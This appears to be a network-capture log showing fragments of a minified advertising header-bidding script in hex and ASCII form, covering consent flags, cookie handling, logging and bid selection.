                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC17INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 20 30 70 78 3b 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 77 69 6e 64 6f 77 2e 6d 6e 6a 73 3d 77 69 6e 64 6f 77 2e 6d 6e 6a 73 7c 7c 7b 7d 2c 77 69 6e 64 6f 77 2e 6d 6e 6a 73 2e 45 52 50 3d 77 69 6e 64 6f 77 2e 6d 6e 6a 73 2e 45 52 50 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 6f 72 28 76 61 72 20 6c 3d 22 22 2c
                                                                                                                                                                                                                  Data Ascii: <html><head></head><body style="margin: 0px; padding: 0px; background-color: transparent;"><script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var l="",
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC57INData Raw: 43 54 45 54 22 2c 22 41 50 50 4c 59 5f 47 4f 4f 47 4c 45 5f 52 45 53 54 52 49 43 54 49 4f 4e 22 2c 22 53 54 4f 50 5f 53 50 41 4d 22 2c 22 53 54 4f 50 5f 57 48 49 54 45 4f 50 53 22 5d 2c 53 39 39 3a 5b 5d 7d 2c 64 66 63 6e 73 74 3a 22 31 4e 59 2d 22 2c 70 73 70 3a 21 30 7d 2c 74 63 66 63 6f 6e 66 69 67 3a 7b 70 61 6d 3a 7b 31 3a 7b 74 70 3a 22 43 22 2c 61 63 74 3a 5b 22 44 49 53 41 42 4c 45 5f 43 4f 4f 4b 49 45 53 59 4e 43 22 2c 22 53 54 4f 50 5f 57 48 49 54 45 4f 50 53 22 2c 22 53 54 4f 50 5f 53 50 41 4d 22 5d 7d 2c 32 3a 7b 74 70 3a 22 46 22 2c 61 63 74 3a 5b 22 44 49 53 41 42 4c 45 5f 41 44 53 22 2c 22 53 54 4f 50 5f 4c 4f 47 47 49 4e 47 5f 56 49 53 49 54 4f 52 5f 49 44 22 2c 22 54 52 49 4d 5f 4c 41 53 54 5f 4f 43 54 45 54 22 5d 7d 2c 33 3a 7b 74 70 3a
                                                                                                                                                                                                                  Data Ascii: CTET","APPLY_GOOGLE_RESTRICTION","STOP_SPAM","STOP_WHITEOPS"],S99:[]},dfcnst:"1NY-",psp:!0},tcfconfig:{pam:{1:{tp:"C",act:["DISABLE_COOKIESYNC","STOP_WHITEOPS","STOP_SPAM"]},2:{tp:"F",act:["DISABLE_ADS","STOP_LOGGING_VISITOR_ID","TRIM_LAST_OCTET"]},3:{tp:
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC73INData Raw: 63 72 6f 6c 6c 48 65 69 67 68 74 2c 74 2e 6f 66 66 73 65 74 48 65 69 67 68 74 2c 65 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 2c 65 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 2c 65 2e 6f 66 66 73 65 74 48 65 69 67 68 74 29 7d 63 61 74 63 68 28 72 29 7b 72 65 74 75 72 6e 20 30 7d 7d 66 75 6e 63 74 69 6f 6e 20 68 28 74 29 7b 74 72 79 7b 74 2e 66 72 61 6d 65 45 6c 65 6d 65 6e 74 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 30 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 76 28 74 2c 65 29 7b 72 65 74 75 72 6e 21 21 4f 28 74 29 26 26 28 4f 28 65 29 26 26 74 2e 69 6e 64 65 78 4f 66 28 65 29 21 3d 3d 2d 31 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 74 2c 65 29 7b 72 65 74 75 72 6e 21 21 4d 28 74 29 26 26 28 49 74 28 74 2c 66 75 6e 63 74 69 6f 6e 28 74 29
                                                                                                                                                                                                                  Data Ascii: crollHeight,t.offsetHeight,e.clientHeight,e.scrollHeight,e.offsetHeight)}catch(r){return 0}}function h(t){try{t.frameElement}catch(e){return!0}return!1}function v(t,e){return!!O(t)&&(O(e)&&t.indexOf(e)!==-1)}function m(t,e){return!!M(t)&&(It(t,function(t)
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC89INData Raw: 6b 69 65 3b 72 65 74 75 72 6e 21 30 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 65 28 74 29 7b 69 66 28 21 61 65 28 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 65 3d 72 2e 63 6f 6f 6b 69 65 2e 69 6e 64 65 78 4f 66 28 74 2b 22 3d 22 29 2c 6e 3d 65 2b 74 2e 6c 65 6e 67 74 68 2b 31 3b 69 66 28 21 65 26 26 74 21 3d 3d 72 2e 63 6f 6f 6b 69 65 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 74 2e 6c 65 6e 67 74 68 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 69 66 28 65 3d 3d 3d 2d 31 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 69 3d 72 2e 63 6f 6f 6b 69 65 2e 69 6e 64 65 78 4f 66 28 22 3b 22 2c 6e 29 3b 72 65 74 75 72 6e 20 69 3d 3d 3d 2d 31 26 26 28 69 3d 72 2e 63 6f 6f 6b 69 65 2e 6c 65 6e 67 74 68 29 2c 75
                                                                                                                                                                                                                  Data Ascii: kie;return!0}catch(t){return!1}}function ue(t){if(!ae())return null;var e=r.cookie.indexOf(t+"="),n=e+t.length+1;if(!e&&t!==r.cookie.substring(0,t.length))return null;if(e===-1)return null;var i=r.cookie.indexOf(";",n);return i===-1&&(i=r.cookie.length),u
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC137INData Raw: 7b 72 2e 51 65 28 65 29 7c 7c 28 65 3d 5b 65 5d 29 2c 74 3d 6f 28 74 29 2c 6e 3d 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 72 2e 61 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 61 2e 48 28 65 2c 74 2c 6e 29 3b 73 77 69 74 63 68 28 74 2e 74 79 70 65 29 7b 63 61 73 65 22 69 6d 67 22 3a 73 28 65 2c 72 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 63 72 69 70 74 22 3a 69 28 65 2c 74 2c 72 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 78 68 72 22 3a 75 28 65 2c 74 2c 72 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 62 22 3a 66 28 65 2c 74 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 69 66 53 63 72 22 3a 64 28 65 2c 74 2c 72 29 7d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 6e 2c 61 29 7b 6e 2e 66 6f 72 63 65 50 72 6f 74 6f 63 6f 6c 3d 3d 3d 21 30 26 26
                                                                                                                                                                                                                  Data Ascii: {r.Qe(e)||(e=[e]),t=o(t),n=n||function(){},r.a(e,function(e){var r=a.H(e,t,n);switch(t.type){case"img":s(e,r);break;case"script":i(e,t,r);break;case"xhr":u(e,t,r);break;case"sb":f(e,t);break;case"ifScr":d(e,t,r)}})}function i(t,n,a){n.forceProtocol===!0&&
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC161INData Raw: 5b 72 5d 29 26 26 28 63 2e 72 65 73 75 6c 74 5b 72 5d 3d 22 50 4f 53 54 22 29 7d 72 65 74 75 72 6e 20 63 2e 72 65 73 75 6c 74 5b 72 5d 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 72 29 7b 69 66 28 22 50 4f 53 54 22 3d 3d 3d 65 29 72 65 74 75 72 6e 20 6f 2e 6c 6f 67 55 72 6c 73 2e 70 6f 67 3b 76 61 72 20 6e 3d 75 28 72 29 3b 72 65 74 75 72 6e 22 6f 72 22 3d 3d 3d 6e 3f 6f 2e 6c 6f 67 55 72 6c 73 2e 6f 67 6f 72 65 67 6f 6e 3a 6f 2e 6c 6f 67 55 72 6c 73 2e 6f 67 7d 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 72 65 74 75 72 6e 20 6f 2e 6c 6f 67 55 72 6c 73 2e 70 6e 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 6f 29 7b 72 65 74 75 72 6e 20 66 28 65 2c 6f 29 2b 61 28 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 29 7b 72 65 74 75 72 6e 20 6f 2e 6c 6f 67 55 72 6c 73 2e 63 72 6c
                                                                                                                                                                                                                  Data Ascii: [r])&&(c.result[r]="POST")}return c.result[r]}function f(e,r){if("POST"===e)return o.logUrls.pog;var n=u(r);return"or"===n?o.logUrls.ogoregon:o.logUrls.og}function a(){return o.logUrls.pn}function d(e,o){return f(e,o)+a()}function p(){return o.logUrls.crl
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC185INData Raw: 30 7d 66 75 6e 63 74 69 6f 6e 20 4a 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 5a 54 28 68 75 29 26 26 74 2e 5a 54 28 46 75 29 26 26 21 74 2e 56 6d 28 45 75 2e 52 45 46 45 52 52 45 52 29 26 26 28 45 75 2e 52 45 46 45 52 52 45 52 3d 46 75 2e 67 65 74 43 6c 65 61 6e 52 65 66 65 72 72 65 72 55 72 6c 28 68 75 2e 67 65 74 52 65 66 65 72 72 65 72 55 72 6c 43 6f 6e 76 65 6e 74 69 6f 6e 61 6c 57 61 79 28 29 29 2c 74 2e 56 47 28 45 75 2e 52 45 46 45 52 52 45 52 29 3d 3d 3d 21 30 26 26 28 45 75 2e 52 45 46 45 52 52 45 52 3d 74 2e 59 28 45 75 2e 52 45 46 45 52 52 45 52 29 29 2c 7a 6e 28 29 3d 3d 3d 45 75 2e 52 45 46 45 52 52 45 52 26 26 28 45 75 2e 52 45 46 45 52 52 45 52 3d 22 22 29 29 2c 45 75 2e 52 45 46 45 52 52 45 52 7c 7c 22 22 7d 66 75 6e 63 74 69 6f 6e 20 51 6e
                                                                                                                                                                                                                  Data Ascii: 0}function Jn(){return t.ZT(hu)&&t.ZT(Fu)&&!t.Vm(Eu.REFERRER)&&(Eu.REFERRER=Fu.getCleanReferrerUrl(hu.getReferrerUrlConventionalWay()),t.VG(Eu.REFERRER)===!0&&(Eu.REFERRER=t.Y(Eu.REFERRER)),zn()===Eu.REFERRER&&(Eu.REFERRER="")),Eu.REFERRER||""}function Qn
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC209INData Raw: 6e 20 6e 3d 74 2c 74 68 69 73 7d 2c 74 68 69 73 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 72 65 74 75 72 6e 20 6e 5b 74 5d 3d 72 2c 74 68 69 73 7d 2c 74 68 69 73 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 5b 74 5d 7d 2c 74 68 69 73 2e 67 65 74 42 79 50 61 74 68 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 74 2e 75 28 6e 2c 72 29 7d 2c 74 68 69 73 2e 73 65 72 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 6b 28 7b 7d 2c 6e 29 7d 2c 74 68 69 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 74 29 7d 7d 72 65 74 75 72 6e 20 6e 7d 29 3b 5f 63 44 28 22 62 69
                                                                                                                                                                                                                  Data Ascii: n n=t,this},this.set=function(t,r){return n[t]=r,this},this.get=function(t){return n[t]},this.getByPath=function(r){return t.u(n,r)},this.serialize=function(){return t.k({},n)},this.hasOwnProperty=function(t){return n.hasOwnProperty(t)}}return n});_cD("bi
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC233INData Raw: 74 63 68 65 72 2e 61 70 70 65 6e 64 28 74 2c 74 68 69 73 2e 4c 4f 47 5f 54 59 50 45 29 7d 2c 74 68 69 73 2e 72 65 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 64 69 73 70 61 74 63 68 65 72 2e 66 69 72 65 28 29 7d 2c 74 2e 6c 28 22 61 6c 6c 3a 72 65 73 65 74 22 2c 22 63 6f 6d 6d 61 6e 64 22 2c 69 29 7d 72 65 74 75 72 6e 20 73 7d 29 3b 5f 63 44 28 22 6c 6f 67 64 69 73 70 61 74 63 68 73 65 72 76 69 63 65 22 2c 5b 22 5f 22 2c 22 65 6d 22 2c 22 6c 6f 67 73 65 6c 66 64 69 73 70 61 74 63 68 65 72 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 72 65 74 75 72 6e 20 72 2e 69 73 48 65 74 65 72 6f 67 65 6e 65 6f 75 73 4c 6f 67 67 69 6e 67 45 6e 61 62 6c 65 64 28 65 29 3f
                                                                                                                                                                                                                  Data Ascii: tcher.append(t,this.LOG_TYPE)},this.reset=function(){e.dispatcher.fire()},t.l("all:reset","command",i)}return s});_cD("logdispatchservice",["_","em","logselfdispatcher"],function(e,r,n){"use strict";function t(e){return r.isHeterogeneousLoggingEnabled(e)?
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC257INData Raw: 75 6e 63 74 69 6f 6e 20 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 39 39 22 21 3d 3d 74 2e 62 72 49 64 26 26 22 31 30 31 22 21 3d 3d 74 2e 62 72 49 64 7c 7c 65 2e 73 65 74 28 22 6f 67 62 64 70 22 2c 22 30 22 29 2e 73 65 74 28 22 62 64 70 22 2c 22 30 22 29 2e 73 65 74 28 22 63 62 64 70 22 2c 22 30 22 29 2e 73 65 74 28 22 64 66 70 42 64 22 2c 22 30 22 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 2c 73 2c 69 29 7b 76 61 72 20 64 3d 74 2e 63 72 69 64 2c 61 3d 74 2e 61 63 69 64 2c 63 3d 74 2e 73 62 64 72 69 64 7c 7c 72 2e 53 79 28 64 2c 61 29 7c 7c 22 22 2c 6d 3d 74 2e 69 73 6e 61 74 3f 70 2e 67 65 74 54 65 6d 70 6c 61 74 65 4b 65 79 46 6f 72 4e 61 74 69 76 65 53 6c 6f 74 28 64 29 3a 22 22 3b 72 65 74 75 72 6e 20 6f 2e 73 65 74 43 6f 6d 6d 6f 6e 50 72
                                                                                                                                                                                                                  Data Ascii: unction t(e,t){return"99"!==t.brId&&"101"!==t.brId||e.set("ogbdp","0").set("bdp","0").set("cbdp","0").set("dfpBd","0"),e}function s(e,t,s,i){var d=t.crid,a=t.acid,c=t.sbdrid||r.Sy(d,a)||"",m=t.isnat?p.getTemplateKeyForNativeSlot(d):"";return o.setCommonPr
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC305INData Raw: 64 65 6c 3b 64 2e 73 65 74 28 22 6e 61 6d 65 22 2c 74 2e 6e 61 6d 65 7c 7c 22 55 4e 4b 4e 4f 57 4e 22 29 2e 73 65 74 28 22 73 74 61 63 6b 22 2c 74 2e 6d 65 73 73 61 67 65 7c 7c 22 4e 4f 4e 45 22 29 2e 73 65 74 28 22 63 72 69 64 22 2c 74 2e 63 72 69 64 7c 7c 22 22 29 2e 73 65 74 28 22 64 66 70 44 69 76 22 2c 74 2e 73 6c 6f 74 49 64 7c 7c 22 22 29 2e 73 65 74 28 22 70 76 69 64 22 2c 74 2e 70 76 69 64 7c 7c 22 22 29 2e 73 65 74 28 22 64 66 70 42 64 22 2c 74 2e 64 66 70 62 64 7c 7c 22 22 29 2e 73 65 74 28 22 6c 69 64 22 2c 74 2e 6c 69 7c 7c 22 22 29 2e 73 65 74 28 22 74 72 65 66 22 2c 74 2e 72 63 74 72 3e 30 29 2e 73 65 74 28 22 72 66 63 22 2c 74 2e 72 63 74 72 29 2e 73 65 74 28 22 63 70 72 22 2c 31 65 33 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2e 73 65
                                                                                                                                                                                                                  Data Ascii: del;d.set("name",t.name||"UNKNOWN").set("stack",t.message||"NONE").set("crid",t.crid||"").set("dfpDiv",t.slotId||"").set("pvid",t.pvid||"").set("dfpBd",t.dfpbd||"").set("lid",t.li||"").set("tref",t.rctr>0).set("rfc",t.rctr).set("cpr",1e3*Math.random()).se
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC329INData Raw: 7b 7d 2c 6f 74 3d 7b 7d 2c 61 74 3d 7b 7d 2c 75 74 3d 5b 5d 2c 73 74 3d 7b 7d 2c 63 74 3d 7b 7d 2c 70 74 3d 74 68 69 73 3b 74 68 69 73 2e 67 65 74 50 72 6f 76 69 64 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 74 7d 2c 74 68 69 73 2e 69 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 74 68 69 73 2e 67 65 74 52 65 71 75 65 73 74 43 6f 75 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 24 7d 2c 74 68 69 73 2e 73 65 74 4e 65 74 77 6f 72 6b 54 69 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 73 74 3d 74 7d 2c 74 68 69 73 2e 61 64 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 24 2b 2b 2c 70 74 2e 61 74 74 61 63 68 4c 69 73 74 65 6e 65 72 73 28 6e 29 3b 76 61 72 20 72 3d 74 2e 67 65 74 28 73 2e 50 72
                                                                                                                                                                                                                  Data Ascii: {},ot={},at={},ut=[],st={},ct={},pt=this;this.getProviders=function(){return ut},this.id=function(){return n},this.getRequestCount=function(){return $},this.setNetworkTime=function(t){st=t},this.add=function(t,n){$++,pt.attachListeners(n);var r=t.get(s.Pr
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC353INData Raw: 6c 6c 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 73 28 6e 29 7b 65 2e 5a 54 28 70 29 26 26 65 2e 5a 54 28 70 2e 67 65 74 41 6c 6c 28 29 29 26 26 6e 2e 70 61 72 73 65 28 70 2e 67 65 74 41 6c 6c 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 72 28 6e 29 7b 65 2e 5a 54 28 64 29 26 26 65 2e 5a 54 28 64 2e 67 65 74 41 6c 6c 28 29 29 26 26 6e 2e 70 61 72 73 65 28 64 2e 67 65 74 41 6c 6c 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 65 2e 5a 54 28 66 29 26 26 6e 2e 70 61 72 73 65 28 66 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 72 65 74 75 72 6e 20 74 28 65 29 2c 73 28 65 29 2c 72 28 65 29 2c 6f 28 65 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 6e 29 7b 76 61 72 20 74 3d 65 2e 67 65 74 50 72 6f 76 69 64 65 72 43 6f 6e 66 69 67 46 6f 72 53 6c 6f 74 28 29
                                                                                                                                                                                                                  Data Ascii: ll())}function s(n){e.ZT(p)&&e.ZT(p.getAll())&&n.parse(p.getAll())}function r(n){e.ZT(d)&&e.ZT(d.getAll())&&n.parse(d.getAll())}function o(n){e.ZT(f)&&n.parse(f)}function a(e){return t(e),s(e),r(e),o(e),e}function c(e,n){var t=e.getProviderConfigForSlot()
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC377INData Raw: 6f 6d 43 6f 6f 6b 69 65 53 79 6e 63 29 26 26 21 73 2e 69 73 41 63 74 69 6f 6e 41 70 70 6c 69 63 61 62 6c 65 28 22 44 49 53 41 42 4c 45 5f 43 4f 4f 4b 49 45 53 59 4e 43 22 29 3f 6f 2e 64 6f 43 75 73 74 6f 6d 43 6f 6f 6b 69 65 53 79 6e 63 28 29 3a 74 2e 70 75 73 68 28 65 29 7d 29 2c 54 28 74 29 29 7d 66 75 6e 63 74 69 6f 6e 20 5a 28 29 7b 59 3d 21 30 3b 76 61 72 20 6e 3d 62 28 29 3b 46 28 6e 29 2c 68 28 6e 29 2c 79 28 29 7d 66 75 6e 63 74 69 6f 6e 20 79 28 29 7b 76 61 72 20 6e 3d 61 2e 67 65 74 45 78 70 69 72 79 4c 65 66 74 46 72 6f 6d 43 6f 6f 6b 69 65 28 29 2c 65 3d 61 2e 63 68 65 63 6b 46 6f 72 43 6f 6f 6b 69 65 44 65 6c 65 74 69 6f 6e 28 71 28 29 29 3b 28 6e 3c 3d 30 7c 7c 65 29 26 26 61 2e 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 29 2c 61 2e 64 65 6c 65
                                                                                                                                                                                                                  Data Ascii: omCookieSync)&&!s.isActionApplicable("DISABLE_COOKIESYNC")?o.doCustomCookieSync():t.push(e)}),T(t))}function Z(){Y=!0;var n=b();F(n),h(n),y()}function y(){var n=a.getExpiryLeftFromCookie(),e=a.checkForCookieDeletion(q());(n<=0||e)&&a.deleteCookie(),a.dele
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC401INData Raw: 7b 76 61 72 20 74 3d 61 2e 67 65 74 49 6e 66 6f 28 22 6c 73 22 29 3b 69 66 28 65 2e 5a 54 28 74 29 29 7b 76 61 72 20 72 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 74 29 3b 72 65 74 75 72 6e 20 72 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6e 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 76 28 29 7b 76 61 72 20 6e 3d 72 2e 6c 56 28 29 2c 74 3d 72 2e 67 63 28 29 26 26 21 72 2e 51 6e 28 29 3b 72 65 74 75 72 6e 21 28 65 2e 5a 54 28 6e 29 7c 7c 74 7c 7c 21 61 2e 4a 62 28 29 29 26 26 28 21 65 2e 69 28 4f 29 7c 7c 21 31 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 29 7b 72 65 74 75 72 6e 20 73 28 29 2c 43 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 29 7b 76 61 72 20 6e 3d 28 6e 65 77 20 44 61 74 65 29 2e 67
                                                                                                                                                                                                                  Data Ascii: {var t=a.getInfo("ls");if(e.ZT(t)){var r=JSON.parse(t);return r.hasOwnProperty(n)}return!1}function v(){var n=r.lV(),t=r.gc()&&!r.Qn();return!(e.ZT(n)||t||!a.Jb())&&(!e.i(O)||!1)}function p(e){return s(),C.hasOwnProperty(e)}function k(){var n=(new Date).g
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC425INData Raw: 74 68 69 73 7d 2c 74 68 69 73 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 72 65 74 75 72 6e 20 65 5b 74 5d 3d 69 2c 74 68 69 73 7d 2c 74 68 69 73 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 5b 74 5d 7d 2c 74 68 69 73 2e 70 72 6f 76 69 64 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 74 2e 5a 54 28 65 29 29 72 65 74 75 72 6e 20 69 2e 73 65 74 28 22 70 72 76 22 2c 65 29 2c 74 68 69 73 3b 76 61 72 20 72 3d 69 2e 67 65 74 28 22 70 72 76 22 29 3b 72 65 74 75 72 6e 20 72 2e 77 68 65 72 65 28 7b 7d 29 7d 2c 74 68 69 73 2e 69 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 28 22 63 72 69 64 22 29 7d 2c 74 68 69 73 2e 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e
                                                                                                                                                                                                                  Data Ascii: this},this.set=function(t,i){return e[t]=i,this},this.get=function(t){return e[t]},this.providers=function(e){if(t.ZT(e))return i.set("prv",e),this;var r=i.get("prv");return r.where({})},this.id=function(){return i.get("crid")},this.code=function(){return
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC449INData Raw: 69 6f 6e 28 74 2c 6e 2c 69 2c 72 2c 63 2c 6f 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 69 2e 63 61 6c 6c 28 74 68 69 73 29 2c 74 68 69 73 2e 69 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 28 22 62 67 69 64 22 29 7d 2c 74 68 69 73 2e 61 6c 69 61 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 28 22 62 67 61 6c 73 22 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 29 7b 63 2e 63 61 6c 6c 28 74 68 69 73 29 7d 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 76 61 72 20 69 3d 6e 2e 62 69 64 64 65 72 47 72 6f 75 70 73 7c 7c 7b 7d 3b 74 2e 61 28 69 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 2e 61 64 64 28 28 6e 65 77 20 61 29 2e 63 6f 6e 66 69 67 28 74 29
                                                                                                                                                                                                                  Data Ascii: ion(t,n,i,r,c,o,s){"use strict";function a(){i.call(this),this.id=function(){return this.get("bgid")},this.alias=function(){return this.get("bgals")}}function u(){c.call(this)}function e(){var i=n.bidderGroups||{};t.a(i,function(t){f.add((new a).config(t)
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC473INData Raw: 7c 7c 6e 75 6c 6c 7d 2c 74 68 69 73 2e 67 65 74 57 69 6e 6e 69 6e 67 42 69 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 69 66 28 69 21 3d 3d 21 30 26 26 46 28 29 2c 30 3d 3d 3d 63 74 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 65 74 2e 69 73 57 69 6e 6e 65 72 44 65 63 3d 21 30 2c 65 3f 5b 6e 75 6c 6c 2c 6e 75 6c 6c 5d 3a 6e 75 6c 6c 3b 69 66 28 65 74 2e 69 73 57 69 6e 6e 65 72 44 65 63 29 72 65 74 75 72 6e 20 57 28 65 29 3b 69 66 28 53 28 29 2c 4d 28 29 2c 63 74 2e 6c 65 6e 67 74 68 3e 30 29 7b 76 61 72 20 6e 3d 63 74 5b 30 5d 3b 77 28 6e 29 26 26 28 6e 2e 73 65 74 28 22 69 77 62 22 2c 22 31 22 29 2c 65 74 2e 68 61 73 41 6e 79 57 69 6e 42 69 64 3d 21 30 29 7d 76 61 72 20 72 3d 57 28 65 29 2c 73 3d 74 2e 51 65 28 72 29 3f 72 5b 30 5d 3a 72 3b 72 65 74
                                                                                                                                                                                                                  Data Ascii: ||null},this.getWinningBid=function(e,i){if(i!==!0&&F(),0===ct.length)return et.isWinnerDec=!0,e?[null,null]:null;if(et.isWinnerDec)return W(e);if(S(),M(),ct.length>0){var n=ct[0];w(n)&&(n.set("iwb","1"),et.hasAnyWinBid=!0)}var r=W(e),s=t.Qe(r)?r[0]:r;ret
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC521INData Raw: 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 69 66 28 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 63 61 62 75 63 6b 22 29 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 63 61 62 75 63 6b 22 29 2c 72 3d 6e 65 77 20 44 61 74 65 28 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 63 62 65 78 70 22 29 29 3b 72 65 74 75 72 6e 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 3e 72 2e 67 65 74 54 69 6d 65 28 29 3f 6e 75 6c 6c 3a 74 2e 57 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 3d 3d 3d 6e 29 72 65 74 75 72 6e 20 65 7d 29 7d 72 65
